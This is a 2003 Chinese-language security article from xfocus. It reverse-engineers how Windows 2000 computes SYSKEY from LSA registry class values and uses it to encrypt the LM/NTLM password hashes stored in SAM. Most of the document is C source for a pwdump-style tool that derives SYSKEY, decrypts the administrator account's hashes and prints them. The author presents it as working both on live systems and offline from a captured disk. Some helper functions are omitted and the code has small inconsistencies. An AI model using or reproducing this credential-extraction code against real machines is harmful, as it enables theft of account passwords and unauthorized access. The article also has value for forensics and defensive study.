SAM的散列存儲(chǔ)加密解密算法以及SYSKEY的計(jì)算
創(chuàng)建時(shí)間:2003-06-04
文章屬性:原創(chuàng)
文章提交:
flashsky (flashsky1_at_sina.com)
SAM的散列存儲(chǔ)加密解密算法以及SYSKEY的計(jì)算
轉(zhuǎn)摘請(qǐng)注明作者和安全焦點(diǎn)
作者:FLASHSKY
SITE:
WWW.XFOCUS.NET,
WWW.SHOPSKY.COM郵件:flashsky@xfocus.org
作者單位:?jiǎn)⒚餍浅椒e極防御實(shí)驗(yàn)室
SAM中存放在密碼散列這是大家都知道的,但是其密碼存放在對(duì)應(yīng)相對(duì)SID的V鍵下面卻是一種加密的形式,如何通過(guò)這個(gè)加密的串計(jì)算出密碼散列了,大家用PWDUMP3這樣的工具可以導(dǎo)出散列來(lái),主要原理是系統(tǒng)空間會(huì)存在一個(gè)sampsecretsessionkey,PWDUMP3就是拷貝一個(gè)服務(wù)到對(duì)方機(jī)器上,讀出這個(gè)lsass進(jìn)程空間的sampsecretsessionkey再進(jìn)行解密的,其實(shí)這個(gè)sampsecretsessionkey的生成也是非常復(fù)
雜的,我們這里做一個(gè)比PWDUMP3更深入的一個(gè)探討和分析,sampsecretsessionkey的計(jì)算與生成,這樣我們就能在直接從物理文件中計(jì)算出sampsecretsessionkey,來(lái)解密注冊(cè)表中的密碼散列,對(duì)于一個(gè)忘記密碼的系統(tǒng)或一個(gè)不知道用戶口令但已經(jīng)獲得磁盤的系統(tǒng)有這重要意義,這樣我們完全就能通過(guò)注冊(cè)表文件的分析來(lái)解密注冊(cè)表中的密碼散列。
通過(guò)分析,我們發(fā)現(xiàn)以前在NT中常說(shuō)的SYSKEY在W2K系統(tǒng)的這個(gè)過(guò)程中起著非常重要的作用,其實(shí)SYSKEY已經(jīng)做為W2K的一個(gè)固定組件而存在了,我們下面給出一個(gè)整個(gè)過(guò)程:
系統(tǒng)引導(dǎo)時(shí):
計(jì)算獲得SYSKEY
讀取注冊(cè)表中的SAM\SAM\Domains\Accoun\V中保存的KEY信息(一般是最后的0X38字節(jié)的前0X30字節(jié))
使用SYSKEY和F鍵的前0X10字節(jié),與特殊的字串"!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%","0123456789012345678901234567890123456789"做MD5運(yùn)算,再與F鍵的后0X20字節(jié)做RC4運(yùn)算就可以獲得sampsecretsessionkey,這個(gè)
sampsecretsessionkey固定存放在LSASS進(jìn)程中,作為解密SAM中加密數(shù)據(jù)到散列時(shí)用
-------------------------------------------------
|系統(tǒng)計(jì)算出的SYSKEY |
|F鍵信息的前0x10字節(jié) |MD5
|"!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%"|--->------
|"0123456789012345678901234567890123456789" | |RC4
-------------------------------------------------- |------>sampsecretsessionkey
|
F鍵信息的后0x20字節(jié) -------------------
當(dāng)需要解密SAM中加密數(shù)據(jù)到散列時(shí)(如遠(yuǎn)程登陸):
讀取sampsecretsessionkey,再與當(dāng)前用戶的相對(duì)SID,散列類型名(如LMPASSWORD,NTPASSWORD)做MD5運(yùn)算獲得針對(duì)這個(gè)用戶密碼散列的sessionkey
利用sessionkey用RC4解密第一道加密的散列,再將用戶相對(duì)ID擴(kuò)展成14字節(jié)做DES切分,生成DESECB,再對(duì)用RC4處理后的散列進(jìn)行分開(kāi)成2次DES解密就可以獲得密碼散列。
-------------------------
|sampsecretsessionkey |
|sid |MD5
|"LMPASSWOR"/"NTPASSWOR"|--->sessionkey---
| | |RC4 2次DES(填充SID做KEY切分)
------------------------- |----->-------------------------->HASH
|
對(duì)應(yīng)的SAM中加密的密碼散列 ---------------------------------
這個(gè)算法相當(dāng)好,保證了不同用戶的相同散列在SAM存放不一樣(相對(duì)SID不一樣),不同機(jī)器的同一SID同口令的SAM中的散列存放不一樣(SYSKEY不同);
這個(gè)算法的DES/RC4都是可逆的,這樣如果我們能通過(guò)離線(文件)方式獲得SYSKEY的話(其他的信息都可以分析SAM文件獲得),我們完全實(shí)現(xiàn)離線修改SAM中口令的效果,不過(guò)這需要對(duì)注冊(cè)表的結(jié)構(gòu)和SAM中V/F鍵的數(shù)據(jù)結(jié)構(gòu)再做深入的研究,這里就不談了。
那么SYSKEY是如何計(jì)算出來(lái)的呢?這可能是我發(fā)現(xiàn)MS最牛皮的一個(gè)地方了,先開(kāi)始想一定會(huì)存放在注冊(cè)表某處,呵呵,最后跟蹤MS引導(dǎo)時(shí)候的WINLOGON進(jìn)程才知道,SYSKEY是這樣計(jì)算出來(lái)的,很多人會(huì)大掉眼鏡吧:
SYSKEY的計(jì)算是:SYSTEM\\CurrentControlSet\\Control\\Lsa下的
JD,Skew1,GBG,Data四個(gè)鍵值的CLASS值通過(guò)換位得來(lái)的,靠,佩服MS。這樣我們完全可以離線分析注冊(cè)表就能獲得對(duì)其SAM的加密散列的導(dǎo)出或改寫了。
下面就是給出的完全實(shí)現(xiàn)計(jì)算SYSKEY-》sampsecretsessionkey,對(duì)特定用戶的SAM中加密的密碼散列再解密的代碼:當(dāng)然如果從運(yùn)行系統(tǒng)中解密散列也可以直接讀取sampsecretsessionkey,就象PWDUMP3那樣做的一樣也是可以的,但是如果要實(shí)現(xiàn)離線的就還需要再分析更多的東西。
另外關(guān)于PWDUMP具體的方法,由于其是加密和反跟蹤的,我沒(méi)時(shí)間做仔細(xì)調(diào)式分析,但是從REGMON監(jiān)視其注冊(cè)表操作的過(guò)程來(lái)說(shuō),是沒(méi)有去讀LSA下的任何東西的,因此可以斷定他是直接獲得ampsecretsessionkey來(lái)進(jìn)行對(duì)SAM內(nèi)容的解密到散列的。
//下面幾個(gè)函數(shù)的實(shí)現(xiàn),DES相關(guān)的盒,ECB等的定義參考我以前發(fā)的文章 中的代碼,這里不再給出
//void deskey(char * LmPass,unsigned char * desecb)
//void rc4_key(unsigned char * rc4keylist,unsigned char * rc4key,int keylen);
//void md5init(unsigned char * LM);
//void md5final(unsigned char * LM);
//void initLMP(char * pass,unsigned char * LM);
//以前給出的des函數(shù)的實(shí)現(xiàn)沒(méi)有解密的部分,并且有個(gè)小錯(cuò)誤,因此這里再給出完整的一個(gè)
#include <stdio.h>
#include <windows.h>
#include "des.h"
void getsyskey(unsigned char * syskey);
void getsampsecretsessionkey(unsigned char * syskey,unsigned char * fkey);
void md5init(unsigned char * LM);
void md5final(unsigned char * LM);
void rc4_key(unsigned char * rc4keylist,unsigned char * rc4key,int keylen);
void rc4_2bc6(unsigned char * rc4keylist,int keylen,unsigned char * key);
void getsamkey(unsigned char * sampsskey,unsigned char * uid,unsigned char * passwordtype,unsigned char * sessionkey);
void getsamhash(unsigned char * ensaminfo,unsigned char * sessionkey,unsigned char * uid);
void initLMP(char * pass,unsigned char * LM);
void deskey(char * LmPass,unsigned char * desecb);
void des(unsigned char * LM,char * magic,unsigned char * ecb,long no);
void main()
{
int i;
//下面為了簡(jiǎn)單,這3個(gè)是直接指定的用戶,相對(duì)SID的注冊(cè)表鍵名和相對(duì)SID,大家也可以寫成完全根據(jù)用戶名獲取的方式
char username[]="SAM\\SAM\\Domains\\Account\\Users\\Names\\administrator";
char keyname[]="SAM\\SAM\\Domains\\Account\\Users\\000001F4";
unsigned long uid=0x1F4;
unsigned char syskey[0x10];
unsigned char ensamnt[0x10];
unsigned char ensamlm[0x10];
unsigned char sessionkey[0x10];
unsigned char buf[0x400];
unsigned char sampsecretsessionkey[0x10];
unsigned char lmhash[0x10];
unsigned char nthash[0x10];
unsigned char fkey[0x30];
unsigned long ss;
DWORD regtype;
DWORD regint;
unsigned char passwordtype[5][100]={"LMPASSWORD","NTPASSWORD","LMPASSWORDHISTORY","NTPASSWORDHISTORY","MISCCREDDATA"};
HKEY hkResult;
HKEY hkResult1;
//SAM中的鍵讀取先要提升自己成為L(zhǎng)OCASYSTEM權(quán)限,這里并沒(méi)有實(shí)現(xiàn),自己增加其中的代碼
//讀出F鍵中用于計(jì)算
regint=0x400;
ss=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SAM\\SAM\\Domains\\Account",0,KEY_READ,&hkResult);
if(ss!=0)
printf("no Privilege!\n");
ss=RegQueryValueEx(hkResult,"F", NULL,®type,buf,®int);
for(i=regint-1;i>=0;i--)
if(buf[i]!=0)
break;
memcpy(fkey,buf+i-0x2f,0x30);
ss=RegOpenKeyEx(HKEY_LOCAL_MACHINE,username,0,KEY_READ,&hkResult);
//檢查此用戶是否存在
if(ss!=ERROR_SUCCESS)
return;
//讀取該用戶下的V鍵中加密的散列信息
//由于目前還未解析V中的結(jié)構(gòu),我們就直接讀最后的那一串,一般都是如此存放在此
//但也不排除例外,那就需要具體分析V中的結(jié)構(gòu)來(lái)計(jì)算了
regint=0x400;
ss=RegOpenKeyEx(HKEY_LOCAL_MACHINE,keyname,0,KEY_READ,&hkResult);
ss=RegQueryValueEx(hkResult,"V", NULL,®type,buf,®int);
memcpy(ensamnt,buf+regint-0x18,0x10);
memcpy(ensamlm,buf+regint-0x2c,0x10);
//計(jì)算SYSKEY,W2K系統(tǒng)默認(rèn)SYSKEY使用,且成為其固定的一個(gè)組件
getsyskey(syskey);
//利用SYSKEY,F(xiàn)鍵中的KEY計(jì)算sampsecretsessionkey
getsampsecretsessionkey(syskey,fkey);
memcpy(sampsecretsessionkey,fkey+0x10,0x10);
//上面的就是系統(tǒng)引導(dǎo)時(shí)完成的工作,這個(gè)sampsecretsessionkey固定保存在LSASS的進(jìn)程空間內(nèi)
//當(dāng)認(rèn)證等或如PWDUMP3工作時(shí)候,就是先從系統(tǒng)中直接讀sampsecretsessionkey再進(jìn)行處理
//根據(jù)具體用戶的相對(duì)SID,要恢復(fù)散列的散列類型,生成SESSIONKEY,如下面就是針對(duì)LM散列的
getsamkey(sampsecretsessionkey,&uid,passwordtype[0],sessionkey);
memcpy(lmhash,ensamlm,0x10);
//利用SESSIONKEY,SAM中加密的LM散列,相對(duì)SID做RC4/DES解密獲得真正的散列
getsamhash(lmhash,sessionkey,&uid);
printf("HASH::");
for(i=0;i<0x10;i++)
printf("%02x",lmhash[i]);
printf(":");
//根據(jù)具體用戶的相對(duì)SID,要恢復(fù)散列的散列類型,生成SESSIONKEY,如下面就是針對(duì)NTLM散列的
getsamkey(sampsecretsessionkey,&uid,passwordtype[1],sessionkey);
memcpy(nthash,ensamnt,0x10);
//利用SESSIONKEY,SAM中加密的NTLM散列,相對(duì)SID做RC4/DES解密獲得真正的散列
getsamhash(nthash,sessionkey,&uid);
for(i=0;i<0x10;i++)
printf("%02x",nthash[i]);
printf("\n");
}
void getsamhash(unsigned char * ensaminfo,unsigned char * sessionkey,unsigned char * uid)
{
//利用SESSIONKEY,SAM中加密的LM散列,相對(duì)SID做RC4/DES解密獲得真正的散列
unsigned char desecb[128];
unsigned char rc4keylist[0x102];
unsigned char LM[0x10];
unsigned char p1[0xe];
unsigned char p2[0x10];
memcpy(p1,uid,4);
memcpy(p1+4,uid,4);
memcpy(p1+8,uid,4);
memcpy(p1+0xc,uid,2);
//上面是用SID填充DESECB的KEY
rc4_key(rc4keylist,sessionkey,0x10);
rc4_2bc6(rc4keylist,0x10,ensaminfo);
//RC4處理一次再用DES解密
initLMP(p1,LM);
deskey(LM,desecb);
des(p2,ensaminfo,desecb,0);
initLMP(p1+7,LM);
deskey(LM,desecb);
des(p2+8,ensaminfo+8,desecb,0);
memcpy(ensaminfo,p2,0x10);
}
void getsamkey(unsigned char * sampsskey,unsigned long * uid,unsigned char * passwordtype,unsigned char * sessionkey)
{
//根據(jù)具體用戶的相對(duì)SID,要恢復(fù)散列的散列類型,MD5生成SESSIONKEY
unsigned char LM[0x58];
int len,i;
md5init(LM);
for(i=0;i<20;i++)
if(passwordtype[i]==0)
break;
len=i+1;
memcpy(LM+0x18,sampsskey,0x10);
memcpy(LM+0x28,(unsigned char *)uid,4);
memcpy(LM+0x2c,passwordtype,len);
memset(LM+0x2c+len,0x80,1);
memset(LM+0x2c+len+1,0x0,0x58-(0x2c+len+1));
*(DWORD *)LM=0x200;
*(DWORD *)(LM+0X50)=0xF8;
md5final(LM);
memcpy(sessionkey,LM+8,0x10);
}
void getsyskey(unsigned char * syskey)
{
unsigned char keyselect[]={0x8,0xA,0x3,0x7,0x2,0x1,0x9,0xF,
0x0,0x5,0xd,0x4,0xb,0x6,0xc,0xe};
//換位表
unsigned char syskey1[0x10];
HKEY hkResult;
HKEY hkResult1;
int i,j;
long ss;
unsigned char classinfo[0x10];
DWORD c1;
ss=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Control\\Lsa",0,KEY_READ,&hkResult);
if(ss!=ERROR_SUCCESS)
return;
ss=RegOpenKeyEx(hkResult,"JD",0,KEY_READ,&hkResult1);
i=0;
memset(syskey1,0,0x10);
c1=0x10;
if(ss==ERROR_SUCCESS)
{
ss=RegQueryInfoKey(hkResult1,classinfo,&c1,0,0,0,0,0,0,0,0,0);
RegCloseKey(hkResult1);
if(ss==ERROR_SUCCESS)
{
printf("%s\n",classinfo);
for(j=0;j<8;j++)
{
if(classinfo[j]>=0x30 && classinfo[j]<=0x39)
classinfo[j]=classinfo[j]-0x30;
else if(classinfo[j]>='a' && classinfo[j]<='f')
classinfo[j]=classinfo[j]-'a'+0xa;
else if(classinfo[j]>='A' && classinfo[j]<='F')
classinfo[j]=classinfo[j]-'A'+0xa;
else
return;
}
syskey1[i+0]=16*classinfo[0]+classinfo[1];
syskey1[i+1]=16*classinfo[2]+classinfo[3];
syskey1[i+2]=16*classinfo[4]+classinfo[5];
syskey1[i+3]=16*classinfo[6]+classinfo[7];
i=i+4;
}
}
c1=0x10;
ss=RegOpenKeyEx(hkResult,"Skew1",0,KEY_READ,&hkResult1);
if(ss==ERROR_SUCCESS)
{
ss=RegQueryInfoKey(hkResult1,classinfo,&c1,0,0,0,0,0,0,0,0,0);
RegCloseKey(hkResult1);
if(ss==ERROR_SUCCESS)
{
printf("%s\n",classinfo);
for(j=0;j<8;j++)
{
if(classinfo[j]>=0x30 && classinfo[j]<=0x39)
classinfo[j]=classinfo[j]-0x30;
else if(classinfo[j]>='a' && classinfo[j]<='f')
classinfo[j]=classinfo[j]-'a'+0xa;
else if(classinfo[j]>='A' && classinfo[j]<='F')
classinfo[j]=classinfo[j]-'A'+0xa;
else
return;
}
syskey1[i+0]=16*classinfo[0]+classinfo[1];
syskey1[i+1]=16*classinfo[2]+classinfo[3];
syskey1[i+2]=16*classinfo[4]+classinfo[5];
syskey1[i+3]=16*classinfo[6]+classinfo[7];
i=i+4;
}
}
c1=0x10;
ss=RegOpenKeyEx(hkResult,"GBG",0,KEY_READ,&hkResult1);
if(ss==ERROR_SUCCESS)
{
ss=RegQueryInfoKey(hkResult1,classinfo,&c1,0,0,0,0,0,0,0,0,0);
RegCloseKey(hkResult1);
if(ss==ERROR_SUCCESS)
{
printf("%s\n",classinfo);
for(j=0;j<8;j++)
{
if(classinfo[j]>=0x30 && classinfo[j]<=0x39)
classinfo[j]=classinfo[j]-0x30;
else if(classinfo[j]>='a' && classinfo[j]<='f')
classinfo[j]=classinfo[j]-'a'+0xa;
else if(classinfo[j]>='A' && classinfo[j]<='F')
classinfo[j]=classinfo[j]-'A'+0xa;
else
return;
}
syskey1[i+0]=16*classinfo[0]+classinfo[1];
syskey1[i+1]=16*classinfo[2]+classinfo[3];
syskey1[i+2]=16*classinfo[4]+classinfo[5];
syskey1[i+3]=16*classinfo[6]+classinfo[7];
i=i+4;
}
}
c1=0x10;
ss=RegOpenKeyEx(hkResult,"Data",0,KEY_READ,&hkResult1);
if(ss==ERROR_SUCCESS)
{
ss=RegQueryInfoKey(hkResult1,classinfo,&c1,0,0,0,0,0,0,0,0,0);
RegCloseKey(hkResult1);
if(ss==ERROR_SUCCESS)
{
printf("%s\n",classinfo);
for(j=0;j<8;j++)
{
if(classinfo[j]>=0x30 && classinfo[j]<=0x39)
classinfo[j]=classinfo[j]-0x30;
else if(classinfo[j]>='a' && classinfo[j]<='f')
classinfo[j]=classinfo[j]-'a'+0xa;
else if(classinfo[j]>='A' && classinfo[j]<='F')
classinfo[j]=classinfo[j]-'A'+0xa;
else
return;
}
syskey1[i+0]=16*classinfo[0]+classinfo[1];
syskey1[i+1]=16*classinfo[2]+classinfo[3];
syskey1[i+2]=16*classinfo[4]+classinfo[5];
syskey1[i+3]=16*classinfo[6]+classinfo[7];
i=i+4;
}
}
//這4個(gè)鍵的CLASS值組合起來(lái)做換位就是MS的SYSKEY了
for(i=0;i<0x10;i++)
{
syskey[keyselect[i]]=syskey1[i];
}
for(i=0;i<0x10;i++)
printf("0x%02x ",syskey[i]);
printf("\n");
}
void getsampsecretsessionkey(unsigned char * syskey,unsigned char * fkey)
{
unsigned char LM[0x58];
unsigned char rc4keylist[0x102];
char m1[]="!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%";
char m2[]="0123456789012345678901234567890123456789";
md5init(LM);
memcpy(LM+0x18,fkey,0x10);
memcpy(LM+0x28,m1,0x2f);
memcpy(LM+0x57,syskey,1);
*(DWORD *)LM=0x278;
md5final(LM);
memcpy(LM+0x18,syskey+1,0xf);
memcpy(LM+0x27,m2,0x29);
*(DWORD *)LM=0x5c0;
memset(LM+0x50,0x80,1);
memset(LM+0x51,0,7);
md5final(LM);
*(DWORD *)LM=0x600;
memset(LM+0x18,0,0x38);
*(DWORD *)(LM+0x50)=0x3c0;
*(DWORD *)(LM+0x54)=0;
md5final(LM);
rc4_key(rc4keylist,LM+8,0x10);
rc4_2bc6(rc4keylist,0x20,fkey+0x10);
//這里生成在fkey中的前0X10字節(jié)就是sampsecretsessionkey
md5init(LM);
memcpy(LM+0x18,fkey+0x10,0x10);
memcpy(LM+0x28,m2,0x29);
memcpy(LM+0x51,fkey+0x10,0x7);
*(DWORD *)LM=0x248;
md5final(LM);
memcpy(LM+0x18,fkey+0x17,0x9);
memcpy(LM+0x21,m1,0x2f);
memset(LM+0x50,0x80,1);
memset(LM+0x51,0,7);
*(DWORD *)LM=0x5c0;
md5final(LM);
memset(LM+0x18,0,0x40);
*(DWORD *)LM=0x600;
*(DWORD *)(LM+0x50)=0x3c0;
*(DWORD *)(LM+0x54)=0;
md5final(LM);
}
void rc4_2bc6(unsigned char * rc4keylist,int keylen,unsigned char * key)
{
unsigned long c1;
unsigned char d1,b1,a1;
int i;
c1=rc4keylist[0x100];
d1=rc4keylist[0x101];
for(i=0;i<keylen;i++)
{
c1=c1++;
c1=c1%256;
a1=rc4keylist[c1];
d1=d1+a1;
b1=rc4keylist[d1];
rc4keylist[c1]=b1;
rc4keylist[d1]=a1;
a1=a1+b1;
b1=key[i];
a1=rc4keylist[a1];
b1=b1^a1;
key[i]=b1;
}
}
void des(unsigned char * LM,char * magic,unsigned char * ecb,long no)
{
DWORD d1,d2,d3,d4;
DWORD a1,a2,a3;
int i;
d1= *(DWORD *)magic;
d2= *(DWORD *)(magic+4);
d1 = (d1<<4)|(d1>>0x1c);
d3 = d1;
d1 = (d1^d2)&0xf0f0f0f0;
d3 = d3^d1;
d2 = d2^d1;
d2 =(d2<<0x14)|(d2>>0xc);
d1 = d2;
d2 = (d2^d3)&0xfff0000f;
d1 = d1 ^ d2;
d3 = d3^d2;
d1 = (d1<<0xe)|(d1>>0x12);
d2 = d1;
d1 = (d1 ^ d3) & 0x33333333;
d2 = d2 ^ d1;
d3 = d3^d1;
d3 = (d3<<0x16)|(d3>>0xa);
d1 = d3;
d3 = (d3 ^ d2)&0x3fc03fc;
d1 = d1^d3;
d2 = d2^d3;
d1 = (d1<<9)|(d1>>0x17);
d3 = d1;
d1 = (d1^d2)&0xaaaaaaaa;
d3 = d3^d1;
d2 = d2^d1;
d2 = (d2<<1)|(d2>>0x1f);
if(no!=0)
{
for(i=0;i<8;i++)
{
a1=0;
d1=*(DWORD *)(ecb+16*i);
d4=*(DWORD *)(ecb+16*i+4);
d1=(d1^d3)&0xfcfcfcfc;
d4=(d4^d3)&0xcfcfcfcf;
a1=d1&0xff;
a2=(d1>>8)&0xff;
d4=(d4>>4)|(d4<<0x1c);
a3=DESSpBox1[a1/4];
a1=d4&0xff;
d2=d2^a3;
a3=DESSpBox3[a2/4];
d2=d2^a3;
a2=(d4>>8)&0xff;
d1=d1>>0x10;
a3=DESSpBox2[a1/4];
d2=d2^a3;
a1=(d1>>8)&0xff;
d4=d4>>0x10;
a3=DESSpBox4[a2/4];
d2=d2^a3;
a2=(d4>>8)&0xff;
d1=d1&0xff;
d4=d4&0xff;
a1=DESSpBox7[a1/4];
d2=d2^a1;
a1=DESSpBox8[a2/4];
d2=d2^a1;
a1=DESSpBox5[d1/4];
d2=d2^a1;
a1=DESSpBox6[d4/4];
d2=d2^a1;
a1=0;
d1=*(DWORD *)(ecb+16*i+8);
d4=*(DWORD *)(ecb+16*i+0xc);
d1=(d1^d2)&0xfcfcfcfc;
d4=(d4^d2)&0xcfcfcfcf;
a1=d1&0xff;
a2=(d1>>8)&0xff;
d4=(d4>>4)|(d4<<0x1c);
a3=DESSpBox1[a1/4];
a1=d4&0xff;
d3=d3^a3;
a3=DESSpBox3[a2/4];
d3=d3^a3;
a2=(d4>>8)&0xff;
d1=d1>>0x10;
a3=DESSpBox2[a1/4];
d3=d3^a3;
a1=(d1>>8)&0xff;
d4=d4>>0x10;
a3=DESSpBox4[a2/4];
d3=d3^a3;
a2=(d4>>8)&0xff;
d1=d1&0xff;
d4=d4&0xff;
a1=DESSpBox7[a1/4];
d3=d3^a1;
a1=DESSpBox8[a2/4];
d3=d3^a1;
a1=DESSpBox5[d1/4];
d3=d3^a1;
a1=DESSpBox6[d4/4];
d3=d3^a1;
}
d3=(d3>>1)|(d3<<0x1f);
d1=d2;
d2=(d2^d3)&0XAAAAAAAA;
d1=d1^d2;
d3=d3^d2;
d1=(d1<<0x17)|(d1>>9);
d2=d1;
d1=(d1^d3)&0x3fc03fc;
d2=(d2^d1);
d3=d3^d1;
d2=(d2<<0xa)|(d2>>0x16);
d1=d2;
d2=(d2^d3)&0x33333333;
d1=d1^d2;
d3=d3^d2;
d3=(d3<<0x12)|(d3>>0xe);
d2=d3;
d3=(d3^d1)&0xfff0000f;
d2=d2^d3;
d1=d1^d3;
d2=(d2<<0xc)|(d2>>0x14);
d3=d2;
d2=(d2^d1)&0xf0f0f0f0;
d3=d3^d2;
d1=d1^d2;
d1=(d1>>4)|(d1<<0x1c);
*(DWORD *)LM=d1;
*(DWORD *)(LM+4)=d3;
}
else
{
for(i=7;i>=0;i--)
{
a1=0;
d1=*(DWORD *)(ecb+16*i+8);
d4=*(DWORD *)(ecb+16*i+0xc);
d1=(d1^d3)&0xfcfcfcfc;
d4=(d4^d3)&0xcfcfcfcf;
a1=d1&0xff;
a2=(d1>>8)&0xff;
d4=(d4>>4)|(d4<<0x1c);
a3=DESSpBox1[a1/4];
a1=d4&0xff;
d2=d2^a3;
a3=DESSpBox3[a2/4];
d2=d2^a3;
a2=(d4>>8)&0xff;
d1=d1>>0x10;
a3=DESSpBox2[a1/4];
d2=d2^a3;
a1=(d1>>8)&0xff;
d4=d4>>0x10;
a3=DESSpBox4[a2/4];
d2=d2^a3;
a2=(d4>>8)&0xff;
d1=d1&0xff;
d4=d4&0xff;
a1=DESSpBox7[a1/4];
d2=d2^a1;
a1=DESSpBox8[a2/4];
d2=d2^a1;
a1=DESSpBox5[d1/4];
d2=d2^a1;
a1=DESSpBox6[d4/4];
d2=d2^a1;
a1=0;
d1=*(DWORD *)(ecb+16*i+0);
d4=*(DWORD *)(ecb+16*i+0x4);
d1=(d1^d2)&0xfcfcfcfc;
d4=(d4^d2)&0xcfcfcfcf;
a1=d1&0xff;
a2=(d1>>8)&0xff;
d4=(d4>>4)|(d4<<0x1c);
a3=DESSpBox1[a1/4];
a1=d4&0xff;
d3=d3^a3;
a3=DESSpBox3[a2/4];
d3=d3^a3;
a2=(d4>>8)&0xff;
d1=d1>>0x10;
a3=DESSpBox2[a1/4];
d3=d3^a3;
a1=(d1>>8)&0xff;
d4=d4>>0x10;
a3=DESSpBox4[a2/4];
d3=d3^a3;
a2=(d4>>8)&0xff;
d1=d1&0xff;
d4=d4&0xff;
a1=DESSpBox7[a1/4];
d3=d3^a1;
a1=DESSpBox8[a2/4];
d3=d3^a1;
a1=DESSpBox5[d1/4];
d3=d3^a1;
a1=DESSpBox6[d4/4];
d3=d3^a1;
}
d3=(d3>>1)|(d3<<0x1f);
d1=d2;
d2=(d2^d3)&0XAAAAAAAA;
d1=d1^d2;
d3=d3^d2;
d1=(d1<<0x17)|(d1>>9);
d2=d1;
d1=(d1^d3)&0x3fc03fc;
d2=(d2^d1);
d3=d3^d1;
d2=(d2<<0xa)|(d2>>0x16);
d1=d2;
d2=(d2^d3)&0x33333333;
d1=d1^d2;
d3=d3^d2;
d3=(d3<<0x12)|(d3>>0xe);
d2=d3;
d3=(d3^d1)&0xfff0000f;
d2=d2^d3;
d1=d1^d3;
d2=(d2<<0xc)|(d2>>0x14);
d3=d2;
d2=(d2^d1)&0xf0f0f0f0;
d3=d3^d2;
d1=d1^d2;
d1=(d1>>4)|(d1<<0x1c);
*(DWORD *)LM=d1;
*(DWORD *)(LM+4)=d3;
}
}